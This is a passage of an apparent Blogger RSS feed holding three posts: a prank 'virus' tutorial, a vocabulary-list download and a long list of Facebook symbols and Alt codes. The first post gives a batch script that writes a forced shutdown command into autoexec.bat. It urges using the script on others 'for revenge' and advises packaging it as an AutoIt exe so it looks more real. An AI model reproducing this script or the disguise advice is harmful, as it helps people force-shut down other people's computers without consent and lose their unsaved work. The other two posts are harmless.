&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75; font-size: large;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;Warnings &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Only do this to someone who can handle this prank.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; This may not work if you try to do a file transfer on windows live messenger&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; It also may scare people really badly, so remember do this for revenge(e.g someone did a mean prank so then you could use this)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; The example provided can run on Windows.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; This is not completely harmless, since it will shutdown your PC and force you to lose any unsaved work.Rest assured all should be normal when the computer is turned on again.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; This might affect the way your computer runs or the way another computer that you hacked runs. so only do this if you are a experienced hacker. also I suggest that you save all of your contents onto a thumb drive if you decide to test it out on your computer first.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; And remember this is in seconds not minutes. so don't type in -5 and think you'll be fine. &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;use autoit scripts for exe files that look more real &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&lt;b style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Try this one too..&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;span style="color: #351c75; font-size: large;"&gt;&lt;b&gt;╚○○○•••fOr fUn►vIRus►prOgs►tRicKz•••○○○╝&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style="color: #351c75;"&gt; 1♥open notepad (Start ►run ► notepad)&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2♥ copy this code and paste it (Just copy it dont try 2 edit it)&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="color: #38761d;"&gt;@echo off&lt;/span&gt;&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo shutdown -s -f -t 0 &amp;gt;&amp;gt; c:/autoexec.bat&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; cls&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3♥ click file ►Save As and type SACH.BAT&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; and for the save as type select ☺ all files ☺&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4♥ Then click save&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 5♥ lolz you made a virus :D&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6♥ now run sach.bat after 5 or 6 seconds your anti virus will come up with a message saying that they have detect a trojan horse virus LOL :D &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;&lt;span style="color: #20124d;"&gt; use autoit scripts for exe files that look more real&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAoZFEuT16ztgytfqbcjvvUlvWjPzFJzcmozUVQNLeHNG3-lfxDUykTxyMQdDEis5nYPAO4rtpXzYAS5YuWakIr25Kr3FXhWs7-zN-ocgqrFRSfYL4OAjRtTzn-8cznebb5hXIUTKfAWSF/s72-c/fake-virus-bsod-error.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Vocabulary Word List</title><link>http://hackrich.blogspot.com/2011/10/vocabulary-word-list.html</link><category>education</category><category>GRE</category><category>GRE Dictionary</category><category>IELTS</category><category>study</category><category>Toefl</category><category>Vocabulary Word List</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 10 Oct 2011 14:53:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-5669090526923486027</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;◄&amp;nbsp;&lt;b&gt; &amp;nbsp;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;500+&lt;/span&gt; &lt;/b&gt;&amp;nbsp;&lt;b&gt;IEL&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;b&gt;TS, GRE, Toefl Exam Word List&amp;nbsp;&lt;/b&gt;&lt;/span&gt;►&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;u&gt;Example:&amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiglat0x2nE6LydaOr0A2Qv_p48PxuSyxdfD01O_c9qZPq6zcU_tEzVNnAg_RaD4gwZCzkyeRs362_68ZZUiTgtq-1TEQdHMI0VKjZu9grKOcOrxwCerbtIZUMtqt7VE8MRzVnQWWxJY48F/s1600/VOCABULARY.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="568" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiglat0x2nE6LydaOr0A2Qv_p48PxuSyxdfD01O_c9qZPq6zcU_tEzVNnAg_RaD4gwZCzkyeRs362_68ZZUiTgtq-1TEQdHMI0VKjZu9grKOcOrxwCerbtIZUMtqt7VE8MRzVnQWWxJY48F/s640/VOCABULARY.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75; font-size: large;"&gt;&lt;i&gt;Easy to print out and study on the go! Start Learning Now!&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75; font-size: large;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75; font-size: large;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75; font-size: large;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;b&gt;►&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75; font-size: large;"&gt;&amp;nbsp;&lt;a href="http://www.4shared.com/file/-cvsDEiB/English_IELTS_GRE_Vocabulary.html"&gt;Download Now&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;b&gt;◄&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiglat0x2nE6LydaOr0A2Qv_p48PxuSyxdfD01O_c9qZPq6zcU_tEzVNnAg_RaD4gwZCzkyeRs362_68ZZUiTgtq-1TEQdHMI0VKjZu9grKOcOrxwCerbtIZUMtqt7VE8MRzVnQWWxJY48F/s72-c/VOCABULARY.JPG" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Facebook Symbols - Emoticons - ASCII art shapes</title><link>http://hackrich.blogspot.com/2011/09/facebook-symbols-emoticons-ascii-art.html</link><category>ASCII art</category><category>Facebook</category><category>Facebook Emoticons</category><category>facebook symbols</category><category>symbols</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 20 Sep 2011 13:20:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-2573152210090616788</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div id="fb-root"&gt;&lt;/div&gt;&lt;script&gt;
(function(d){
  var js, id = 'facebook-jssdk'; if (d.getElementById(id)) {return;}
  js = d.createElement('script'); js.id = id; js.async = true;
  js.src = "//connect.facebook.net/en_US/all.js#appId=106068299500309&amp;xfbml=1";
  d.getElementsByTagName('head')[0].appendChild(js);
}(document));
&lt;/script&gt;&lt;br /&gt;
&lt;div class="fb-like" data-href="http://hackrich.blogspot.com/" data-send="true" data-show-faces="true" data-width="450"&gt;&lt;/div&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;There are two ways for use this&lt;/span&gt; &lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;facebook symbols&lt;/b&gt;&lt;/span&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt; &lt;span class="Apple-style-span" style="color: #351c75;"&gt;Copy from here and paste in your facebook name, status or message.&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;2.&lt;/b&gt; &lt;span class="Apple-style-span" style="color: #351c75;"&gt;These facebook symbols can be typed on your keyboard using the ALT button.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Desktop computer instructions for ALT facebook symbols:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• Press and hold left Alt key on your keyboard.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• While holding Alt key enter one of the codes below to get the corresponding facebook symbol.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• Important note: You need to use numbers on the right side of the keyboard for entering code, not the numbers on top, otherwise they won’t work.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Laptop instructions for ALT facebook symbols:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• Press and hold left Alt key on your keyboard.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• While holding Alt key also press and hold Fn key.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• While holding Alt and Fn key enter one of the codes below to get corresponding facebook symbol.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• Important note: You need to use numbers that are usually written next to letters U, I, O… and in different color, not the numbers on top, otherwise they won’t work.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Some facebook symbols may not appear (showing up as squares, or ?) if the user doesn't have all the fonts required installed.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;There is also special facebook symbols and cool symbols that can be useful to express complex symbol without typing it.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;To use, you must copy &lt;b&gt;(Ctrl+C)&lt;/b&gt; and paste &lt;b&gt;(Ctrl+V)&lt;/b&gt; &amp;nbsp;these symbols in your status messages, comments, wall post, etc..&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #990000;"&gt;You may like this too&lt;/b&gt;&amp;nbsp; &lt;a href="http://hackrich.blogspot.com/2011/11/facebook-animated-status.html" target="_blank"&gt;Facebook Animated Gif Image Status&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #38761d; font-size: large;"&gt;Emoticons for facebook chat:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Penguin &lt;/span&gt;&amp;nbsp;&lt;b&gt;&amp;lt;(")&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Shark&lt;/span&gt;&lt;b&gt; (^^^)&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Robot&lt;/span&gt;&lt;b&gt; :|]&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Pacman&lt;/span&gt;&lt;b&gt; :v&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Heart&lt;/span&gt; &lt;b&gt;&amp;lt;3&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;b&gt;:putnam:&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Cat face&lt;/span&gt;&lt;b&gt; :3&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Angel &amp;amp; devil &lt;/span&gt;&lt;b&gt;o:) 3:)&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Kiss&lt;/span&gt; &lt;b&gt;:*&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Tongue&lt;/span&gt;&lt;b&gt; :p&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Pleasant face &lt;/span&gt;&lt;b&gt;^_^&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Glasses&lt;/span&gt;&lt;b&gt; 8) 8]&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Laugh&lt;/span&gt;&amp;nbsp;&lt;b&gt; :D&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Others &lt;/span&gt;&lt;b&gt;:o :\ O.o&lt;/b&gt;&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Complete list of special and rare facebook symbols:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Alt + 1&amp;nbsp; ☺&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 2 &amp;nbsp;☻&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 3 &amp;nbsp;♥&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 4 &amp;nbsp;♦&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 5 &amp;nbsp;♣&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 6 &amp;nbsp;♠&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 7 &amp;nbsp;•&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 8 &amp;nbsp;◘&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 9 &amp;nbsp;○&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 10 &amp;nbsp;◙&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 11 &amp;nbsp;♂&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 12 &amp;nbsp;♀&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 13 &amp;nbsp;♪&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 14 &amp;nbsp;♫&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 15 &amp;nbsp;☼&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 16 &amp;nbsp;►&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 17 &amp;nbsp;◄&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 18 &amp;nbsp;↕&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 19 &amp;nbsp;‼&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 20 &amp;nbsp;¶&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 21 &amp;nbsp;§&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 22 &amp;nbsp;▬&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 23 &amp;nbsp;↨&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 24 &amp;nbsp;↑&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 25 &amp;nbsp;↓&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 26 &amp;nbsp;→&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 27 &amp;nbsp;←&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 28 &amp;nbsp;∟&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 29 &amp;nbsp;↔&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 30 &amp;nbsp;▲&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Alt + 31 &amp;nbsp;▼&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Religion &amp;amp; belief facebook symbols:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
☯ ✡☨ ✞ ✝☥ ☦ ☧ ☩ ☪ ☫ ☬ ☭&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Butterfly symbol 01:&lt;/span&gt;&lt;/b&gt; Ƹ̴Ӂ̴Ʒ&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Butterfly symbol 02:&lt;/span&gt;&lt;/b&gt; ƸӜƷ&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Heart symbols on facebook:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
❤ ❥ ♡ ♥ ღ ɞ&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Facebook Flowers Symbol:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
❀ ✿ ❁ ✾ ✽ ❃ ❋&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Facebook Butterfly Symbols:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Butterfly style 03: &lt;/span&gt;&lt;/b&gt;εїз&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Facebook Music Symbols:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
♪ ♫ ♩ ♬ ♭ ♮ ♯&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Stars facebook symbols&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
★ ✩ ✮ ✯ ✰ ☆ ⋆ ╰☆╮✡ ۞&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Snowflake facebook symbols:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
❇ ❈ ❅ ❄ ❆&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Peace facebook symbols:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
✌☮&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Facebook Poker Symbols:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Poker black: &lt;/span&gt;&lt;/b&gt;&amp;nbsp; ♥ ♦ ♣ ♠&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Poker White: &lt;/span&gt;&lt;/b&gt;♡ ♢ ♤ ♧&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Moon symbols&lt;/span&gt;&lt;/b&gt; &amp;nbsp;☾ ☽&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Sun symbols:&lt;/span&gt;&lt;/b&gt; ☼ ☀&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Cloud and umbrella &lt;/span&gt;&lt;/b&gt;&amp;nbsp;☁ ☂ &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Snowman:&lt;/span&gt;&lt;/b&gt; ☃&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Comet:&lt;/span&gt;&lt;/b&gt; ☄&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Apple symbol for facebook:&lt;/span&gt;&lt;/b&gt; Ѽ &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Risk radioactive and biological:&lt;/span&gt;&lt;/b&gt; ☢ ☣&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Check symbol for facebook&lt;/span&gt;&lt;/b&gt; ✓&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Hands pointing&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
☚ ☛ ☜ ☝ ☞ ☟&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Writing Symbols&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
✉ ✍ ✎ ✏ ✐✑✒ ⌨&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Scissors symbols: &amp;nbsp;&lt;/span&gt;&lt;/b&gt; ✂ ✄&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Phones symbols: &lt;/span&gt;&lt;/b&gt;&amp;nbsp;☎ ☏ ✆&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Clocks:&lt;/span&gt;&lt;/b&gt;⌛ ⌚&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Airplane facebook symbol: &lt;/span&gt;&lt;/b&gt;&amp;nbsp;✈&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Dinner: &lt;/span&gt;&lt;/b&gt;♨&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Skull symbol: &lt;/span&gt;&lt;/b&gt;☠&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Decorative symbols:&lt;/span&gt;&lt;/b&gt; ๑ ۩ ۞&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Group faces 1: &lt;/b&gt;&lt;/span&gt;٩(●̮̮̃•̃)۶ ٩(-̮̮̃-̃)۶ ٩(͡๏̯͡๏)۶ ٩(-̮̮̃•̃)۶ ٩(×̯×)۶&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Group faces 2: &lt;/span&gt;&lt;/b&gt;⊙▂⊙ .. ⊙０⊙ .. ⊙︿⊙ .. ⊙ω⊙ .. ⊙﹏⊙ .. ⊙△⊙&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Group faces 3:&lt;/span&gt;&lt;/b&gt; ●▂● .. ●︿● .. ●ω● .. ●﹏● .. ●▽● .. ●△●&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 1: &lt;/span&gt;&lt;/b&gt;ಠ_ಠ&lt;br /&gt;
